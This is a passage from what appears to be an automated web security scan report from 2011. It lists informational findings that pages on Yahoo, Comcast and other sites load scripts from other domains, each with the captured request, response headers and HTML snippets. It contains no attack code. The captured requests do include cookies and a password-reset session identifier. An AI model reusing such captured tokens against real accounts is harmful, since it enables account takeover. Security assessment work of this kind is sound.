Set-Cookie: MYTMI=4; expires=Wed, 05-Sep-2012 12:29:47 GMT; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 171806

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html class="ua-wk ua-win">
<head>
<script>var gTop = Number(new Date());</script> <script> </s
...[SNIP]...
</script><script type="text/javascript" src="http://l.yimg.com/a/lib/my/js/core_seed_0.0.6.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js">
</script>
...[SNIP]...

16.23. http://l.yimg.com/p/social_buttons/facebook-share-iframe.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /p/social_buttons/facebook-share-iframe.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /p/social_buttons/facebook-share-iframe.php?u=http%3A%2F%2Fnew.music.yahoo.com%2Fblogs%2Flive%2F13348%2Fred-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video%2F&t=Red%20Hot%20Chili%20Peppers%20Exclusive%20Interview!%20New%20Album,%20New%20Member,%20New%20Video%20-%20Maximum%20Performance&l=Share&t_sec=mit_share&t_act=facebook HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:42 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: max-age=300, public
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 2374

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/3.1.1/build/cssreset/res
...[SNIP]...
</a>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

16.24. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landing.optionshouse.com
Path:   /rate/395/yhofin/qbttn/stk_oldgb/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk HTTP/1.1
Host: landing.optionshouse.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602; domain=optionshouse.com; expires=Wed, 05-Sep-2012 05:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:47:14 GMT
Content-Length: 14053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head id="ball_page_ti
...[SNIP]...
<!--end js code for font substitution-->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...

16.25. https://login.comcast.net/myaccount/lookup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/lookup

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1 HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/login?forceAuthn=1&continue=%2fSecure%2fHome.aspx&s=ccentral-cima&r=comcast.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:26 GMT
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=322
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 12359

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
   
   
   <title>Forgot your Comcast ID?</title>
   <link rel="stylesheet" type="text/css" href=
...[SNIP]...
<!-- Load jQuery from Google's CDN -->
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://www.google.com/recaptcha/api/challenge?k=6Lc6JwEAAAAAAAMsonray6oG09balZGZ2IONzjBx"></script>
...[SNIP]...

16.26. https://login.yahoo.com/config/login_verify2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login_verify2

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /config/login_verify2?.src=finance&.intl=us&.done=http://finance.yahoo.com/portfolios/ HTTP/1.1
Host: login.yahoo.com
Connection: keep-alive
Referer: http://finance.yahoo.com/q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50181


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
</script>
<script type="text/javascript" src="https://s.yimg.com/lq/lib/reg/js/yahoo_dom_event_animation_connection_2.8.2_inc_superads_capslock_loginmd5_min_12.js"></script>
...[SNIP]...

16.27. http://maps.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: maps.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _ygms=z^6&l^350%20Sansome%20Street%20San%20Francisco%20CA%2094104%20us&v^1&c^37.793676%7C-122.401025; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:56 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Expires: Wed, 16 Mar 1966 12:00:00 GMT
Cache-Control: must-revalidate
Pragma: no-cache
Set-Cookie: _ygms=z%5E6%26l%5E350+Sansome+Street+San+Francisco+CA+94104+us%26v%5E1%26c%5E37.793676%7C-122.401025; expires=Thu, 06-Oct-2011 12:44:56 GMT; path=/; domain=.maps.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18922

<html><head><title>Yahoo! Maps, Driving Directions, and Traffic</title><meta name="DESCRIPTION"content="Yahoo! Maps, Driving Directions, Satellite View and Traffic. Rated the best online mapping exper
...[SNIP]...
</div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...
</div><script type="text/javascript"
src="http://maps.yimg.com/fo/config_objects.php?ver=1.9.6.11&.lang=en-US&.region=us&.partner=">
</script><script type="text/javascript"src="http://l.yimg.com/a/i/us/map/aj/451/globalmaps-top-201006232158.js"></script>
...[SNIP]...

16.28. http://movies.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: movies.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:57 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.5
Content-Length: 143676


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
   <head>
       <title>Yahoo! Movies: Read Movie Reviews, Find Showtimes and View Trail
...[SNIP]...
</div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...
</script><script src="http://ads.yimg.com/a/a/1-/jscodes/flash9/misc_9as2_20081114.js"></script>
...[SNIP]...
</SCRIPT><script src="http://ads.yimg.com/a/a/1-/jscodes/flash6/lrec_20081114.js"></script>
...[SNIP]...
</script><script id="load_wrapper" type="text/javascript" src="http://mi.adinterax.com/wrapper.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved --> <script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://l.yimg.com/a/lib/mov/mv_fp-min_1.6.js"></script>
       <script type="text/javascript" src="http://l.yimg.com/a/lib/mov/ymv_trending_now_search_1.3.js"></script>
...[SNIP]...

16.29. http://new.music.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://new.music.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: new.music.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; YMT=d=dj0xJnQ9MCZ0cz0xMzE1MjUxODE1&s=RKnJfnz7ookDnnWANSk9kA--; YMP_VOLUME=0.5; mlap_us=%7B%22d%22%3A%5B%5B%22yahooVideosContainer%22%2C%22ySearch%22%2C%22yMusicImages%22%2C%22yahooAlbums%22%2C%22yNews%22%2C%22Youtube%22%5D%2C%5B%22yahooTracksPopular%22%2C%22yConcerts%22%2C%22lastfm%22%2C%22pandora%22%2C%22flickr%22%2C%22iTunes%22%2C%22Amazon%22%5D%5D%2C%22m%22%3A%22%22%2C%22i%22%3A%22us%22%2C%22v%22%3A%221.1%22%2C%22c%22%3A0%7D; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 92265

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script type="text/javascript" src="http://l.yimg.com/p/js/compressed/music_global_top_1.11.0.js"></script>
...[SNIP]...
</style>
<script type="text/javascript" language="javascript" src="http://us.js2.yimg.com/us.js.yimg.com/lib/flash/swfobject/1.0/swfobject.js"></script>
...[SNIP]...
</div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/tabview/tabview-min.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://l.yimg.com/p/combo?music/d/js/1314018381/mini/webplayerloader-onsite-min.js&music/d/js/concerts/1314018379/mini/concertsSummary.js"></script>
...[SNIP]...
</script>
   
<script type="text/javascript" src="http://l.yimg.com/p/js/compressed/music_global_bottom_1.13.0.js"></script>
...[SNIP]...

16.30. http://new.music.yahoo.com/blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://new.music.yahoo.com
Path:   /blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/ HTTP/1.1
Host: new.music.yahoo.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; YMT=d=dj0xJnQ9MCZ0cz0xMzE1MjUxODE1&s=RKnJfnz7ookDnnWANSk9kA--; YMP_VOLUME=0.5; mlap_us=%7B%22d%22%3A%5B%5B%22yahooVideosContainer%22%2C%22ySearch%22%2C%22yMusicImages%22%2C%22yahooAlbums%22%2C%22yNews%22%2C%22Youtube%22%5D%2C%5B%22yahooTracksPopular%22%2C%22yConcerts%22%2C%22lastfm%22%2C%22pandora%22%2C%22flickr%22%2C%22iTunes%22%2C%22Amazon%22%5D%5D%2C%22m%22%3A%22%22%2C%22i%22%3A%22us%22%2C%22v%22%3A%221.1%22%2C%22c%22%3A0%7D; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:34 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: MwPhCom_degraded_status=false; path=/
Cache-Control: private
Content-Type: text/html;charset=utf-8
X-Cache: MISS from new.music.yahoo.com
Connection: close
Content-Length: 103483

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script>
rtTop = Number(new Date());
</script>
<script type="text/javascript" src="http://l.yimg.com/p/js/compressed/music_global_top_1.11.0.js"></script>
...[SNIP]...
</style>
<script type="text/javascript" language="javascript" src="http://us.js2.yimg.com/us.js.yimg.com/lib/flash/swfobject/1.0/swfobject.js"></script>
...[SNIP]...
</div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://l.yimg.com/p/combo?music/d/js/blogs/1314018371/mini/yahoo.music.blogs.js&music/d/js/1314018381/mini/webplayerloader-onsite-min.js"></script>

<script type="text/javascript" src="http://us.js.yimg.com/lib/media/phugc/mwphcom_min_2.5.9.js"></script>

<script type="text/javascript" src="http://l.yimg.com/p/js/compressed/music_global_bottom_1.13.0.js"></script>
...[SNIP]...

16.31. http://omg.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omg.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.5
Content-Length: 70391

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

   
   <title>omg! Celebrity gossip, news, photos, babies, couples, hotties, and more - omg! on Ya
...[SNIP]...
</script><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...
</noscript><script type="text/javascript"src="http://l.yimg.com/d/lib/rt/rto1_78.js"></script>
...[SNIP]...
<!--QYZ ,;;;2115806991;;-->                
               
<script language="javascript" src="http://l.yimg.com/a/combo?omg/js/omg-main-2.1.1.js&omg/js/menu-1.1.0.js&omg/js/deferloader-1.0.0.js"></script>
...[SNIP]...

16.32. http://pro.tweetmeme.com/button.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pro.tweetmeme.com
Path:   /button.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /button.js?url=http%3A%2F%2Fnew.music.yahoo.com%2Fblogs%2Flive%2F13348%2Fred-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video%2F&style=compact&service=bit.ly&t_sec=mit_share&t_act=retweet HTTP/1.1
Host: pro.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 06 Sep 2011 12:49:45 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-Url-Lookup: OrAdd (156)
X-Pro-Served-In: 0.0025007724761963
X-Served-By: h00
Content-Length: 6589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <meta content="tex
...[SNIP]...
</style>

<script type="text/javascript" src="http://l.yimg.com/d/combo?yui/3.1.1/build/yui/yui-min.js&amp;ult/ylc_1.9.js"></script>
...[SNIP]...

16.33. http://realestate.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: realestate.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Cache-Control: private
Content-Length: 71991

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Yahoo! Real Estate - Homes for Sale, Houses for Sale & Real Estate</
...[SNIP]...
</div>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?d/lib/yui/2.8.1/build/yahoo-dom-event/yahoo-dom-event.js&d/lib/yui/2.5.2/build/container/container-min.js&qf/static/js/4.3.21/overlay-201105050424.js&qf/static/js/4.3.21/ult-strip-201105050424.js&d/lib/uh/15/js/uh_rsa-1.0.9.js&qf/static/js/4.3.21/header-201105050424.js&d/lib/yui/2.5.2/build/connection/connection-min.js&d/lib/yui/2.5.2/build/autocomplete/autocomplete-min.js&qf/static/js/4.3.21/homepage-201105050424.js&qf/static/js/4.3.21/global-201105050424.js"></script>
...[SNIP]...

16.34. http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.yahoo.com
Path:   /search/New_York/New_York/homes-for-sale

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search HTTP/1.1
Host: realestate.yahoo.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Cache-Control: private
Content-Length: 173778

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>10010 Real Estate & Homes for Sale, 10010 Houses - Yahoo! Real Estate</titl
...[SNIP]...
</div>

